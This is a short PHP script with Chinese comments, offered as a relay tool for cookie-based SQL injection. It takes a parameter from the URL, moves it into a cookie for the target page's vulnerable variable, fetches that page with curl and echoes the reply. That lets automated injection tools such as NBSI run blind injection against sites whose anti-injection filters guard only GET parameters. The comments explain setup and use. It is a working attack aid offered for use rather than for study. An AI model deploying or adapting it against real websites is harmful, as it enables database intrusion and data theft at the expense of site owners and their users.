<?php
/*
cookies 注入也加速 工具 PHP版
by 职业欠钱
最近遇到一个挂了防注入的东东，COOKIE注入可行，不过手工注入太辛苦了，便四处寻找加速工具
mika的工具依赖于SQL 错误开启的模式，而我遇到的这个是不显示错误信息的
只能够盲注了。
曾经找到一个ASP版的加速工具，其原理是将GET变量放到COOKIE里，然后调用XML去访问注入页面
将返回信息显示出来
这样的好处是可以用NBSI之类的常规注入工具进行检测
不过也许人品不好，我在用ASP版的加速工具的时候，什么也没返回
所以便有了这个简陋的PHP程序
*/

//使用方法:
//修改相关参数后,将本文件放到一个支持PHP的空间上
//把http://www.yousite.com/cookieinject.php?id=123
//填写到NBSI等注入工具中即可

error_reporting(7);
ini_set("max_execution_time",0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
/*
articleId 换成注入页面的变量
例如 http://127.0.0.1/news.asp?articleId=123
注入变量就是articleId
*/
$inject="articleId";
//session是原来的COOKIE,可以自己抓包获取
$session ="ASPSESSIONIDSCBRDARD=AAGHANMCCHBPLDNPCIMFOLPI;";
$cookie=$inject."=".$id.";".$session;
//echo $cookie;
//referer 是引用页地址,一般和目标网站相同
$referer="http://127.0.0.1/";
//url是注入页面的地址,注意这里不要再把注入变量写进去
$url="http://127.0.0.1/news.asp";
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//这一句是为了把图片和iframe的相对地址改为绝对地址,根据需要可以注释掉
$content=str_replace("src=\"","src=\"".$referer,$content);
echo $content;
?>